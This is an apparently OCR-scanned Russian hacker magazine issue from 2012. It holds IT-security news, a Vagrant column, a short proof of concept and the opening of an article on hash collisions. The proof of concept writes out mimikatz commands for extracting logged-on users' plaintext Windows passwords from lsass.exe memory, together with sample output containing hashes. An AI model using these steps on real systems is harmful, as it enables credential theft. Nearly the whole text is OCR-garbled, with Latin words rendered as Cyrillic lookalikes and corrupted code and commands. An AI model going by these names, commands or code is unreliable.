В ПЕРВЫЕ ЧАСЫ ПОСЛЕ 
СПЕЦОПЕРАЦИИ П03А- 
КРЫТИЮ МЕ6А0РЮА0, про- 
шедшей 19января, трафик 
всемирной сети снизился 
на 2-3%, говорятэксперты 
РеерРіеІсІ Меіѵѵогкв. 




УСПЕШНУЮ 0005-АТАКУ 
НА САЙТЫ АМЕРИКАНСКИХ 
ФОНДОВЫХ БИРЖ N А50А0, 

ВАТ5 и других осуществила 
группа І_ОМСѵѵаѵе99. Таким 
образомхакеры поддержа- 
ли «движение 99%». 
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НОВАЯ МАС 05X10.8 — Моипіаіп Ыоп («горный лев») появится в продаже в конце лета 2012 года. 



КАК ВЫЖИВАЕТ ВАРЮ5НАВЕ 

АДВОКАТ ИЗВЕСТНОГО ФАЙЛООБМЕННИКА ДАЛ ИНТЕРВЬЮ 



ВЗЛОМ 6006ЕЕѴѴАЕЕЕТ 



ПОДБИРАЕМ РШ К ВИРТУАЛЬНОМУ БУМАЖНИКУ 



едаііріоасі закрыли, другие файловые хости нги здорово напуганы, 
ноРарісІЗЬаге в это время живет и здравствует. А ведь всего два года 
назад файлообмен ни к у поминался в докладе РІААи МРАА, как од но из 
«известных мест» по размещению пиратского контента. Как«рапиде»удалось 
уйти из-под прицела правообладателей, рассказал ресурсуТоггепіРгеак 
адвокат компании Дэниел Рей мер. Приведем самые интересные тезисы из его 
рассказа: 

РарісІЗИаге всегда по первому требованию правообладателей удаляет 
любые файлы, размещенные у них на хостинге. Этим занимается специальный 
отдел — апІі-аЬизе сІерагІтепЕ 

Компания разработала специальный краулер, который постоянно монито- 
рит форумы, доски объявлений и варезные блоги в поиске информации о на- 
рушении интеллектуальных прав, которые имеют место в системе РарісІЗЬаге. 
Собранная информация оценивается, проверяется и обрабатывается всетем 
же отделом. Конечно, Реймер отказался сообщить подробности о краулере или 
назвать идентификатор бота. Но отметил, что это «весьма сложная техноло- 
гия», способная обойти практически любые способы защиты форумов от неза- 
регистрированных пользователей. 

Еще в декабре 2010 года компания потратила большие деньги, наняв высо- 
кооплачиваемую вашингтонскуюфирму йіііко, которая имеетдоступ в высшие 
эшелоны власти итам отстаиваетинтересы РарісІБЬаге. В задачу Оиіко также 
входитработа надимиджем РарісІБЬаге. 

Еще один важный козырь живучего файлообмен ника — отсутствие пар- 
тнерской программы. Таковые, по мнению правообладателей, стимулируют 
пиратство. 






В РарісІБИаге 
уверены:файловый 
хостингдолжен 
выглядеть как 
приличныйсервис 
вроде йгорЬох'а, как 
респектабельная 
компания, которая 
занимается исклю- 
чительно легальным 
бизнесом. 



ОБНОВИЛСЯ ЛЕГЕНДАРНЫЙ МЕДИАПЛЕЕР 



ѴЬС ОБНОВИЛСЯ до 
ВЕРСИИ 2.0 ТѴѴОРЮѴѴЕП. 
СРЕДИ УЛУЧШЕНИЙ: 
ЭКСПЕРИМЕНТАЛЬНАЯ 
ПОДДЕРЖКАДИСКОВ 
ВШ-РАѴ И НОВЫХ ФОРМАТОВ. 



лектронную платежную систему боодіе ѴѴаІІеІ 
запустили еще в середине 2011 года. Разработка 
предназначена для АпбгоісІ-смартфонов, имею- 
щих N ЕС. Используется данная система для платежей 
по беспроводной связи малого радиуса действия. То 
естьбоодІеѴѴаІІеІ позволяет расплачиваться за покупки 
в магазинах с помощью телефона и установленного на нем 
специального приложения. Это не что иное, как «вирту- 
альный бумажник». 

Кстати, подобнаятехнология используется для оплаты 
проезда в Лондонском метро и в метро Японии. Для пере- 
числения средств за покупку или проезд нужно лишь 
провести телефоном рядом с терминал ом оплаты. 

Вопрос безопасности подобных платежных систем 
всегда был актуальной темой. боодіе заверял, что боодіе 
ѴѴаІІеІ отлично защищен, — к примеру, использует ми кро- 
схемубесиге ЕІетепІ, где взашифрованном видехранит 
пользовательские данные. Она отделена отсамого теле- 
фона и ОС, так что только Ооодіе ѴѴаІІеІ может работать 
с ней. 

Но, какпоказываетпрактика, все, чтосоздано 
и защищено человеком, может быть им же и взломано. 
Оказалось, подобрать РІЫ-код к кошельку можно путем 
брутфорса, даже без обращения к серверу Ооодіе! Виной 
всему — уязвимости в архитектуре приложения. 

Специалистпо безопасности Джошуа Рубин, сотруд- 
ник 2ѵеІоІ_АВ5, решил внимательно изучить внутреннюю 
базуданныхздІіІеЗ, где Ооодіе ѴѴаІІеІ хранит всю информа- 
цию. В базе обнаружилась таблица со странным названи- 
ем теіасіаіа. В таблице было всего три строки, нов каждой 
из них — крупный блок бинарных да иных. 

Один ряд называется дтасІ_ЬуІе5_аге_І : ип — это нечто 
вроде зашифрованной файловой системы для хранения 
данных. Содержимое бинарных данных в этой строке явно 
предполагает, что там находится вся информация о бан- 
ковской карте, пишетРубин. 

Другая строка называется беѵісеіпію, и для понимания 
этих да иных пришлось выяснить, чем они обработаны. 
Данныеоказалисьскомпилированы при помощи про- 
токола Ргоіосоі ВіШегз. Это открытая библиотека дл я уни- 
фи каци и данных в сообщениях между системами. Чтобы 
прочитать эти данные, необходимо указать правильный 
теззадеіюгтаі в файле .ргоіо (Ргоіосоі ВіШегВазісз: Эаѵа). 
Сделав подходящий .ргоіо, Джошуа Рубин сумел прочесть 
данные и был глубоко шокирован. Обнаружились Е) п іцие 
ІІзег Юз (1111 Ю), информация об аккаунтах Ооодіе (6АІА) 
и СІоисНо ОеѵісеМеззадіпд (С2йМ, пуш-уведомления), 
статус боодіе ѴѴаІІеІ Беіир, параметр«Т5А» (видимо, 
Тгизіесі бегѵісез), статус 5Е, и самое главное — данные 
СагбРгосІисІіоп І_йесусІе (СРІ_С) и РІ N -код! 

Хэш РІІЧ-кодахранится взашифрованном виде 
в5НА256. Но зная длину РІІЧ-кода (а это четыре цифры), 
достаточно попробовать максимум 10 ОООхэшей 5НА256, 
такчто криптографическая защита перестаетбыть про- 
блемой. РІЫ-код подбирается менеечемза секундудаже 
на смартфоне, так что смысл ограничения на пять попыток 
ввода на сервере полностьютеряется, каки смысл всей 
системы безопасности боодіе ѴѴаІІеІ вообще. Эксперт 
гѵеІоІ_АВ5 сообщает, что разработчики Соодіеуже про- 
информированы об уязвимости и сейчас стараются как 
можнобыстреезакрытьдыру. Посмотреть, какРубин 
демонстрирует уязвимость, можно здесь: 
ѵоіЛи.Ье/Р655бХпЕ іс . 
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ВЫШЕЛ 6000І.Е СН КОМЕ ВЕТА ДЛЯ АНОКОЮ 4-Й ВЕРСИИ. Интересно, что браузер не поддерживает ЛазИ. 



ДОВЕРИЕ К55І_- 
СЕРТИФИКАТАМ ПАДАЕТ 



ЦЕНЗУРА В ТѴѴІТТЕР 
И ВІ_066ЕР 



ПРОШТРАФИЛСЯ ЕЩЕ ОДИН УДОСТОВЕРЯЮЩИЙ ЦЕНТР 





КомпанияСоодІе 
планируетвообще 
отключитьонлай- 
новыепроверки 
аннулированных 
55І_-сертификатов 
вбудущихвѳрсиях 
СИготе.Ихзаменят 
офлайновойбазой 
аннулированных 
сертификатов, об- 
новляться которая 
будетчерезсо- 
фтверныеапдейты. 



□ черед ной камешек у пал в огород сертификатов 551 в част- 
ности и всехнынешнихцентровсертификации вцелом. 
Центр сертификации Тгизіѵѵаѵе признал факт выдачи такого 
сертификата коммерческой компании для ее корпоративной сети. 
Сразу послеэтогобыл создан соответствующийтикетв ВидгіІІа, и на- 
чалось активное обсуждение в группе тогіііа.сіеѵ.зесипіу.роіісу. Если 
удостоверяющий центр ради коммерческой выгоды позволяетсебе 
выдать корневой сертификат некой непонятной компании, это дей- 
ствительно можетобернуться непредсказуемыми последствиями. 
Фирма может подписать что у годно, не обращаясь в удостоверяющий 
центр, и становится возможной атака типа тап-іп-Фе-тісІсІІе и даже 
прослушка защищенного трафика по55І_/ТІ_5. 

В итогепроектМогіІІа разослал всемудостоверяющим центрам, 
корневыесертификаты которых поставляются в составе Рігеіюх 
и других продуктов МогіІІа, письмо с требованием отозвать все вы- 
данные сторонним организациям вторичные корневыесертификаты 
и уничтожить используемые для хранения этих сертификатов Н5М- 
модул и. Удостоверяющие центры должны вы пол нить эти требования 
до27апреля. Еслижетребования небудутисполнены, МогіІІа грозит- 
ся исключить сертификаты всех недобросовестных удостоверяющих 
центров из своего списка. 



ИНТЕРНЕТ-КОМПАНИИ БУДУТ 
ВЫБОРОЧНО ФИЛЬТРОВАТЬ КОНТЕНТ 




е поднимая шума, компания ТѵѵіНег объявила о том, что 
впредь будет блокировать сообщения пользователей в«от- 
дельныхстранах», чтобы авторы не нарушали принятыетам 
нормы. Такое сообщение появилось в корпоративном блоге ТѵѵіНег. 
Там же поясняется, что по мере расширения сервиса, он становит- 
ся доступен в странах, где иначе смотрят на «пределы свободы 
самовыражения». В некоторыхстранахэти пределы таковы, что 
существоватьтамТѵѵіиегне может вовсе, нужна «географическая 
цензура». Пока компания не прибегала к новым возможностям, 
подчеркивается в блоге. Разумеется, пользователи не замедлили 
выразить свое возмущение этим нововведением, и протест под- 
держало движение Апопутоив. Ситуацию поспешил прокоммен- 
тировать исполнительный директор Тѵѵіиег Дик Костоло. По его 
словам, система фильтрациитвитов (или целыхаккаунтов) нужна 
не для осуществления цензуры, а для того, чтобы сервис вообще 
смог продолжить работу в определенных государствах. Сообщения 
будут фильтроваться исключительно по запросу властей и только 
для пользователей сервиса в конкретной стране. Слабое какое-то 
утешение. 

Буквально на следующий день после этого заявления еще и Ооодіе 
сообщил, чтоотныне компаниятоже можетблокироватьдоступ кот- 
дельным блогам, создаваемым на сервисе ВІоддег, потребованию 
правительств определенных стран мира. Впрочем, Соодіехотя бы 
оставляет читателям блогов возможность отключить переадресацию. 





ѴѴ0І.РКАМ АІ.РНА— БАЗА 
ЗНАНИЙ И НАБОР ВЫЧИС- 
ЛИТЕЛЬНЫХ АЛГОРИТМОВ, 

которуючастоошибочно 
называютпоисковиком, под- 
верглась самому значительно- 
муобновлениюза последние 
годы. Была представлена про- 
двинутая версия ѴѴоКгат АІрЬа 
Рго. Подписка на Рго-версию 
обойдется в 4,99$ в месяц 
(2,99$ для студентов), но 
сейчастакже предоставляется 
ибесплатныйтестовый период 
длительностью 14 дней. 




ПО ДАННЫМ ОССАБЗЮЫАЬ 
6АМЕК, большая часть 
рынка смартфонов на базе 
ѴѴіпгіоѵѵз РЬопе 7 (55%) при- 
надлежит НТС. Следом идут 
Батзипд (28%), 1.6(12%) 
и ІЧокіа (4%). 




ІИТЕІ. ПРЕДСТАВИЛА про- 
цессоры Соге І5-2380Р, І5- 
2450Р и І5-2550К на микро- 
архитектуре Бапсіу Вгісіде. 
Главное отличие новинок— 
заблокированный 6РІІ. 
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ОБ ОКОНЧАНИИ СЛУШАНИЙ 
ПО ДЕЛУТНЕ РІ Р АТЕ ВАУ И НЕ 
ТОЛЬКО 



ПОСЛЕДНИЕСВОДКИОПОПУЛЯРНОМТРЕКЕРЕ 




«Качайте мои книги бесплатно 
и, если они вам понравятся, 
купите бумажную копию. Это 
верный путьзаявить индустрии 
о том, что жадность ведет в ни- 
куда». Пауло Коэльо. 




акизвестно, судебный процесс — штука небыстрая. Раз- 
бирательство в отношении администрации «Пиратской 
бухты» исключением из этого правило не являл ось — суд 
длился с 2008 года. 

Новость, пришедшая в начале февраля, подводитподэтим про- 
цессом определенную черту (хотя и нельзя сказать, что все кончилось). 
Дел о в том, что четверо основателей ТЬеРігаІе Вау проиграл и в Верхов- 
ном суде Швеции свою последнюю попытку апелляции. Суд отклонил 
их апелляцию, оставив в силе приговор от ноября 2010 года, который 
предусматриваеттюремныесроки4,8и 10 месяцев, а также возмеще- 
ние правообладателям ущерба в размере 46 миллионов крон (около 
6,8 млн долларов). По идее, теперь ГоттфридСвартхольм, Фредерик 
Нейж, Питер Сунде и Карл Лундстрем должны отправиться втюрьму. 
Утешаетлишьто, что в виду нюансов шведской судебной системы 
(а также потому, что некоторые из обвиняемых более не проживают 
в Швеции) основатели ТРВ не намереваются ни отбывать срок, ни пла- 
тить деньги. Напротив, они планируют обратиться в Суд Европейского 
союза и бороться дальше. Хотя сам ТЬеРігаІеВау.огд в приговоре суда 
нефигурирует, и прямого постановления оегозакрытии нет, нынешняя 
администрация (к которой упомянутая четверка уже не относится, на 
данный момент в команде не осталось ни одного из тех, кто начинал это 
дело), решила перестраховаться. Самыевнимательныенашичитатели 
наверняка заметили, что в феврале трекер переехал в шведскую до- 
меннуюзону.БЕ, гдеиостается на моментнаписанияэтихстрок. Таким 
образом «Пиратскую бухту» укрывают отамериканских правоохрани- 
тельныхорганов, которыетожедавноточатзуб на популярный ресурс. 

По тем же причинам ТРВ в этом месяце начал активный переход 
на тадпеі-ссылки вместо (оггепГфайлов. Если на серверах«Бухты» 
не будет ничего криминального, даже Іоггепі-файлов (каковые, 
в общем, тоже не являются чем-то плохим, но это еще нужно до- 
казывать в суде), обороняться трекеру станет еще легче. К тому же, 
это позволяет здорово экономить место на серверах. Пользователи 
ІоггепНТеак.сотуже проверили последнееутверждение: по их 
данным, общий размер базы трекера сейчас составляет всего 164 
мегабайта, или 90 мегабайт в архивирован ном виде! Вот уж дей- 
ствительно, компактность налицо. Но, помимо судов и переездов, 
администрация «Бухты» по-прежнему борется за свободу инфор- 
мации в целом. Яркий тому пример — эксперимент по продвижению 
писателей, музыкантов и другихтворцов — ТЬе Ргото Вау. Первым 
«продвигаемым» (хотя, конечно, скорее это он продвигал данный 
проект) стал писатель Пауло Коэльо, чье лицо недавно можно было 
наблюдать на главной страницеТЬе Рігаіе Вау. Оказывается, Пауло 
тоже неодобряетБОРАи пишет, что продажи его бумажных книг 
только выросли с тех пор, как читатели разместили их на Р2Р- 
сайтах. В целом, авторские раздачи не новость, но такой рекламы 
им, пожалуй, еще никто не делал. Коэльо призвал всех творческих 
людей поддержать идеютрекера. 




Электронная книга с доступом в Интернет 



Читай. Смотри. Слушай. 




Лучший выбор бесплатных книг 
и популярные новинки. 
Скачивайте и читайте на ѵѵѵѵѵѵ.ѵѵехіег.ги! 




«МЕТРО 2033» ДМИТРИЯ ГЛУХОВСКОГО И ЕЩЕ 
ДВА РОМАНА КУЛЬТОВОЙ СЕРИИ БЕСПЛАТНО 
В ЭТОЙ ЭЛЕКТРОННОЙ КНИГЕ ѴѴЕХЬЕК 
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КОЛОНКА СТЁПЫ ИЛЬИНА 

О БЫСТРОМ СОЗДАНИИ 
ВИРТУАЛЬНЫХ МАШИН 



ЗАДАЧА 

Один из важных плюсов облачных серви- 
сов — возможность быстро поднять столько 
серверов, сколько нужно. Хочешь два — будет 
тебе два. Хочешь сто — два клика мышью и 
будет сто. Все зависит только от твоего ко- 
шелька, платформа же позволяет развернуть 
столько виртуальных серверов (с нужными 
ресурсами), сколько тебе нужно. С виртуаль- 
ной машиной на домашнем компьютере такой 
фокус не проходит. Чтобы создать виртуалку, 
задать ей нужные настройки и, что муторнее 
всего, установить ОС, уходитуйма време- 
ни. В один момент мне стало интересно: а 
можно ли как-то автоматизировать процесс и 
разворачивать новые виртуальные машины 
по-настоящему быстро? Ну, то есть указать 
что-то вроде: «Хочу три виртуальные машины 
с такими-то настройками и установленную на 
них ІІЬипШ последней версии» — и получить 
эти три виртуальные машины без лишнего 
геморроя. В поисках подходящего решения 
я наткнулся на открытый проект Ѵадгапі 
( ѵадгапіир.сот ). 

РЕШЕНИЕ 

Используя в качестве основы бесплатный 
и потому особенно любимый нами Огасіе'з 
ѴИиаІВох (4.0.x или 4.1.x), Ѵадгапі позволяет 
создавать и конфигурировать виртуальные 
машины динамически. 

Как это происходит, предлагаю рассмотреть 
прямо на примере. Загружаем с сіоѵѵпіоасіз. 
ѵадгапіир.сот нужную версию дистрибутива 
(есть версии для ѴѴіпсІоѵѵз, І_іпих, Мае 05 X) и 
поднимаем наш первый инстанс (виртуальную 
машину): 

$ ѵа^гапі: Ьох асісі 1исісІ32 Ыііір : //-Рііез . 
ѵа§гап1:ир . сот/1исісІ32 . Ьох 
$ ѵа^гагтЕ іпіі: 1исісІ32 
$ ѵа§гап1: ир 

Три команды — и новая виртуальная 
машина с установленной ОС запущена (если, 
конечно, ты не забыл предварительно уста- 
новить ѴИиаІВох)! Как несложно догадаться, 



команда «Ьох асісі <имя виртуальной машины>» 
отвечает непосредственно за создание вирту- 
альной машины. 

В качестве параметра ей передается путь 
до специального Ьох-файла — контейнера, 
позволяющего быстро развернуть на вирту- 
альной машине нужную ОС. Мы указали не 
просто путь, а ссылку: в этом случае Ѵадгапі 
сам выкачивает из сети образ. 

Команда «іпіі» инициализирует ОС, причем 
в качестве параметра необходимо указать 
тип системы: в нашем случае это 32-битная 
ІІЬипІи І_исісІ (10. 04). После выполнения этих 
двух команд создается полностью работоспо- 
собная виртуальная машина с 512 Мб на борту. 
Последняя команда — «ѵадгапі ир» — лишь 
запускает ее в фоновом режиме. 

Таким образом можно создавать и запу- 
стить нужное количество виртуалок. Управ- 
лять всем этим хозяйством можно опять же 
через консоль ѴадгапС Работающую виртуаль- 
ную машину можно оставить: 

ѵа^гапі: зизрепсі 

Чтобы посмотреть статус каждой из вир- 
туальной машины, есть специальная команда 
для мониторинга: 

ѵа§гап1: з'Ьа'ЬиБ 

Клюбой из гостевых ОС можно подклю- 
читься по 55Н, используя сам Ѵадгапі: 

ѵа^гагѵЕ ббК 

Если запустить приложение без параме- 
тров, то оно выдаст список всех доступных 
команд. 

Параметры гостевых ОС можно сконфигу- 
рировать (например, прописать статические 
ІР), задав нужные настройки в специальном 
скрипте ѴадгапШІе, который пишется на РиЬу. 

С его же помощью можно, к примеру, про- 
бросить порты до нужной тебе виртуальной 
машины. И, конечно же, ты можешь создавать 
свои Ьох-файлы, из которых далее быстро раз- 
вертывать гостевые ОС. 




Запуск виртуальной машины через Ѵадгапі 



ѴадгапІЬох.ез 




НасайтеѵадгапІЬох.ездоступны образы разныхОС для 
быстрого развертывания 




Код проекта написан на КиЬу 
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" РгооГоГСопсерІ 

Щ ИЗВЛЕЧЬ ПАРОЛИ ПОЛЬЗОВАТЕЛЕЙ 
Ѵ ѴѴШ00ѴѴ5 ИЗ ПАМЯТИ 



Существует немало способов и специальных утилит, чтобы 
извлечь хэши пользовательских паролей из системы. 

А можно извлечь пароль в открытом виде? Можно! 



О ЧЕМ РЕЧЬ? 

Не так давно мы делали комплексный материал о том, как можно 
сдампить пользовательские пароли из ѴѴіпсіоѵѵз-системы. Ути- 
лита ѴѴіпсІоѵѵз Сгесіепііаіз Есіііог - одно из наиболее известных 
и универсальных решений. Однако недавно французские ис- 
следователи выпустили совершенно убойную наработку тітікаіі 
( Ыод.депііІкіЖсот/тітікаЫ . Помимо уже известных приемов, 
она умеет... извлекать пароли пользователей в открытом виде. 
Правда, только тех, которые осуществили вход в системе. Сна- 
чала мы подумали, что это фэйк и подстава, но первый же запуск 
утилиты подтвердил — все работает. Прога предоставляет свою 
собственную консоль, из которой можно запустить необходимые 
модули для различных ситуаций (концепция «швейцарского 
ножа»). Для извлечения паролей в виде открытого текста понадо- 
бится всего три команды: 

тітікаііі # ргіѵі1е§е: :сІеЬи§ 



тітікаііг # іпдесі: : : ргосезз Ізазз.ехе зекигіза.сііі 




Французский вывод тітікаі? не должен тебя пугать 



КАК ЭТО ВЫГЛЯДИТ? 

Попробуем тітікаі. Вывод будет на французском языке, но тебя 
это не должно пугать: чтобы увидеть пароли, не нужно говорить на 
языке Шарля Де Голля: 

тішікаііг 1.0 х86 (рге-аірба) /* Тгаііетепі: сіи Кіші */ 



тітікаііг # ргіѵііе^е: :сІеЬи§ 

йетапсіе сі ' АСТІѴАТІОІМ сіи ргіуі1ё§е : 5еРеЬи§Ргіѵі1е§е : ОК 



тішікаііг # іпіесЕ: іргосезз Ізазз.ехе зекигіза.сііі 
РК0СЕБ5ЕІМТКУ32(1за55 .ехе) .1:Іі32Ргосе55ІР = 488 
АЛеітЕе сіе соппехіоп сіи сііепі:... 

Бегѵеиг соппесіё а ип сііепі: ! 

Мезза§е сіи ргосеззиз : 

Віепѵепие сіапз ип ргосеззиз сіізіапі: 

Сепііі Кімі 



5екигІ.5А : ІіЬгаігіе сіе тапіриіаііоп сіез сіоппёез сіе зёси- 
гіііёз сіапз 1_5А55 



тітікаііг # (Э^еІіІ-О^опРаззіл/огсІз 



Аиіііепіііісаііоп ІсІ : 0;434898 

Раскате сі 1 аиіііепііібсаіііоп : ІМТІ.М 
Іііііізаіеиг рпіпсіраі : Сепііі Іізег 

йотаіпе сГ аиібеп-Шісаііоп : ѵт-м7-и11: 

тзѵ1_0 : Ът{ е52сас67419а9а224аЗЫ08-р- 

3-РабсЬбсІ }, пі1т{ 8846-Р7еаее8-РЫ17асІ06ЬсІсІ830Ь7586с } 
мсі і§ез1: : раззыогсі 

і:зрк§ : раззмогсі 



КАК ЭТО РАБОТАЕТ? 

Казалось бы: нафига хранить пароли в открытом виде, если вы- 
полнить авторизацию можно даже с помощью хэша? На самом 
деле, последнее возможно не везде. Поэтому в винде есть специ- 
альный поставщик безопасности ѵѵсіідезі [ іесЬпеІ.тісгозоЙ.сот/ 
еп-и5/ІіЬгагу/сс778868[ѴѴ5.1 ОІ.азрх ), чтобы поддерживать такие 
типы авторизации как, например, НТТР йідезі АиіЬепІісаІіоп 
и другие схемы, где необходимо знать пароль (и хэша недоста- 
точно). Напоследок скажу, что буквально в момент выхода жур- 
нала в печать аналогичный функционал появился и в упомянутой 
выше утилите ЖЕ. Ш 
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С0ѴЕК5Т0КѴ 



5апіагБаІ5ига (5ап]агйхакер.ги, 1\л/іиег.сот/5ап]аг_5аІ5ига] 



* * 












В современном ІТ-мире контрольную сумму файла 
или любых других важных данных принято считать 
фундаментом для подтверждения неизменности 
исходной информации. Но если ты вспомнишь 
историю с руткитом Біихпеі, то поймешь, что 
уязвимости в популярных алгоритмах для 
расчета таких сумм могут привести к большим 
катастрофам. Давай проверим это. 












тм 





Опасный двойник 




РШ 




На нашем диске ты 
найдешь исходники, 
описанные 
в статье, примеры 
поддельных 
сертификатов, 
а также видео, 
в котором наглядно 
показан процесс 
генерации коллизий. 






Вся информация 
предоставлена 
исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут 
ответственности за 
любой возможный 
вред, причиненный 
материалами данной 
статьи. 



ЛЕГКИМ 
СПОСОБ 
ПОДДЕЛКИ 
КОНТРОЛЬНОЙ 
СУММЫ И ЭЦП 

с помощью 
коллизий 





С0ѴЕР5Т0КѴ 



Теория 



Всегда ли ты проверяешь контрольную сумму скачанных из сети 
файлов? Думаю, нет. Хотя, конечно, для большинства юниксоидов это 
привычное дело, ведь целостность и достоверность скачанных обра- 
зов и исходников порой играет важную роль. Достаточно вспомнить 
недавний взлом кегпеі.огд: тогда лишь самые опытные админи- 
страторы заметили подвох, сравнив контрольную сумму скачанных 
исходников с контрольной суммой, представленной на сайте. 

Ты наверняка знаешь, что контрольная сумма файла зачастую 
представляет собой криптографические хэш-функции, самыми из- 
вестными из которых являются М04, М05 и 5НА-1. Однако с недавних 
пор встала огромная проблема подтверждения целостности исходной 
информации при помощи более криптостойких алгоритмов хэширова- 
ния (контрольных сумм). Имя этой проблемы — коллизии криптогра- 
фических хэш-функций. Так, например, если хэш-функция исполь- 
зуется для создания цифрового ключа, то умение строить для нее 
коллизии равносильно умению подделывать цифровой ключ! Именно 
поэтому в идеале не должно существовать способа поиска коллизий 
для криптографических хэш-функций более быстрого, чем полный 
перебор (брутфорс). Если для некоторой хэш-функции находится более 
быстрый способ, то эта хэш-функция перестает считаться крипто- 
стойкой, а также использоваться для передачи и хранения секретной 
информации. Но всегда ли это так? Оказывается, далеко не всегда. 



МАТЧАСТЬ 



Итак, коллизией хэш-функции Р называются два различных входных 
блока данных — х и у — таких, что Р(х) = Р(у). Рассмотрим в качестве 
примера хэш-функцию Р(х) = х|19|, определенную на множестве це- 
лых чисел. Ее ОДЗ (из школьного курса математики ты должен знать, 
что это такое) состоит из 19 элементов (кольца вычетов по модулю 19), 
а область определения стремится к бесконечности. Так как множе- 
ство прообразов заведомо больше множества значений, коллизии 
обязательно существуют. Что это значит? Давай построим коллизию 
для этой хэш-функции, используя входное значение 38, хэш-сумма 
которого равна нулю. Так как функция Р(х) периодическая с периодом 
19, то для любого входного значения у значение у+19 будет иметь ту 





ТАБЛИЦА ХЭШ-ФУНКЦИЙ, ДЛЯ 
КОТОРЫХ БЫЛИ НАЙДЕНЫ КОЛЛИЗИИ 


Алгоритм 


Длинна хэш-значения 


Скорость шифрования 
(Кбайт/с) 


Одновременная схема Оаѵіез-Меуег (с ШЕА) 


128 


22 


0аѵіез-Меуег(с0Е5) 


64 


61 


Хэш-функция ГОСТ 


256 


11 


НАѴАІДЗ прохода) 


переменная 


168 


НАѴАІ_(4 прохода) 


переменная 


118 


НАѴАІ_(5 прохода) 


переменная 




М02 


128 


23 


М04 


128 


236 


Мй5 


128 


174 


М-хэш(12этапов) 


128 


II 9 ■ 


Ы-хэш (1 5 этапов) 


128 


24 


ШРЕ-МО 


128 


182 


5НА 


160 


75 


Зпег^и (4 прохода) 


128 




Бпег^и (8 проходов) 


128 


23 



Таблица хэш-функций, для которых были найдены коллизии 



же хэш-сумму, что и у. В частности, для входного значения 38 той 
же хэш-суммой будут обладать входные значения 57, 76 и так далее. 
Таким образом, пары входных значений (38,57), (38,76) образуют 
коллизии для хэш-функции Р(х). 

Чтобы хэш-функция Р считалась криптографически стойкой, 
она должна удовлетворять трем основным требованиям, на которых 
основано большинство применений хэш-функций в криптографии. 

1. Необратимость: для зада иного значения хэш-функции т должно 
быть практически невозможно найти блокданныхх, для которого 
Р(х)=т. 

2. Стойкость к коллизиям первого рода: для заданного сообщения 
т должно быть практически невозможно подобрать другое со- 
общение п, для которого Р(п) = Р(т). 

3. Стойкость к коллизиям второго рода:должнобытьпрактически не- 
возможно подобрать пару сообщений, имеющих одинаковый хэш. 

Существует большое количество алгоритмов хэширования 
с различными характеристиками (разрядность, вычислительная 
сложность, криптостойкость и так далее). Простейшим примером 
хэш-функций может служить СРС, который не является алгорит- 
мом хэш-функции, а представляет из себя алгоритм вычисления 
контрольной суммы. По скорости вычисления он в десятки и сотни 
раз быстрее, чем криптографические хэш-функции, а также 
значительно проще в аппаратной реализации. Однако платой за 
высокую скорость является возможность легко подогнать большое 
количество сообщений подзаранее известную сумму. Так разряд- 
ность контрольных сумм (типичное число — 32 бита) ниже, чем 
у криптографических хэшей (типичные числа: 128, 160 и 256 бит), что 
означает возможность возникновения непреднамеренных коллизий. 
В качестве примера можно привести следующий код на С, демон- 
стрирующий получение трех СРС-коллизий на 100 000 итераций: 

#іпс!исІе < зіісііо . М > 

#іпс!исІе <ипІ5І:сІ . б> 

#іпс!исІе <5І:сІ1іЬ. Ь> 

#с!ебпе ИМТЕКАТИШ 1ѲѲѲѲѲ 
іп~Е таіп( ){ 

іп~Е соипі: =0; 

іп~Е іо‘; 

ипвіепесі И авМ : 
сбаг с; 

* 1:аЫе; 

ТаЫе = са11ос(ІІ\ІТЕКАТІОІ\І. 5І2еоТ(ип5І^песО ) ; 

-Рог( і =_0; і< ІІМТЕКАТІОІМ; і++){ 

МазИ = 0; 

То г( з=0і 32 > І13++Н 

с = 33 + (сііаг) (63.Ѳ*гапсІП/(КАШ _МАХ+1.Ѳ)) ; 

ИазИ = Піа зіі * 33) + с; 

} 

ЬазЬ = МазИ + ( ИазМ >> 5); 

-Рог(д=Ѳ; і > з ;]++) ІТ ( 1=аЫе[Л == ЬазЬ) соип1=++; 
1=аЫе[і]=Ііа5Іѵ. 

-Ргее(1:аЫе) ; 

ргіп1=-р("%сІ ѵаіиез %сІ соііібіопбХп" ЛІМТЕКАТІОІМ. соипі: ); 

геТигп 0; 

} 

Среди множества существующих хэш-функций принято осо- 
бенно выделять криптографически стойкие, - они применяются 
в криптографии. К примеру, существуют два наиболее часто 
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Опасный двойник 



Ѵегііу СегііТісаіе 



Сатлюп Пвітн: 
ѢШлА, 

Сіил: 

СгдіпцаЕвгѵ: 
□ гдаплаі^паіііііс 



С-ГЛ-едЗіа Е йсЗгяя ісі Бпсатрагдіяоп 
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ѵ2 



$ш*'. Твіѵѵап 



СіуЛоыЕІагѵ Тбфс-і 
Сйішйу; ТѴѴ 

5е гйі НигпМг Й4Й^ЗіЬ^7йІіев#47гіЗ(1Ыіі7і236* 

№»исг Оідні 2й^0ГсасЗм2ИЭа^?Т^03Ь2с2&Т 



Проверка подлинности сертификата на ѴегіБідп 



встречающихся в повседневной жизни алгоритма: МБ4 и Мй5. 

В плане безопасности МБ5 является более надежным, чем его 
предшественник Мй4. В новый алгоритм разработчики добавили 
еще один раунд — теперь вместо трех их стало четыре. Также была 
добавлена новая константа, чтобы свести к минимуму влияние 
входного сообщения. В каждом раунде на каждом шаге константа 
всегда разная, она суммируется с результатом Р и блоком данных. 
Изменилась функция С = Х2 ѵ (У поі(2)) (вместо XV ѵХ2 ѵ Ѵ2). Резуль- 
тат каждого шага складывается с результатом предыдущего, из-за 
этого происходит более быстрое изменение результата. Изменился 
порядок работы с входными словами в раундах 2 и 3. Даже неболь- 
шое изменение входного сообщения (в нашем случае на один бит: 
А5СІІ символ «5» с кодом 0x3516 = 0001101012 заменяется на символ 
«4» с кодом 0x3416 = 0001101002) приводит к полному изменению 
хэша. Такое свойство алгоритма называется лавинным эффектом. 
Воттак выглядит пример 128-битного (16-байтного) М05-хэша: 

М05( "тсІБ" ) 1Ьс29Ь36-Рб23Ьа82аа-Р6724Тс13Ы6718 

Кстати, если говорить конкретно о коллизиях в алгоритме МБ5, 
то здесь мы можем получить одинаковые значения функции (Р) для 
разных сообщений и идентичного начального буфера. Так, напри- 
мер, для известного сообщения можно построить второе — такое, 
что оно будет иметь такой же хэш, как и исходное. С точки зрения 
математики это означает следующее: М05(ІѴ,І_1] = М05(ІѴ,І_2), где 



IV — начальное значение буфера, а І_1 и І_2 — различные сообще- 
ния. РІапример, если взять начальное значение буфера 

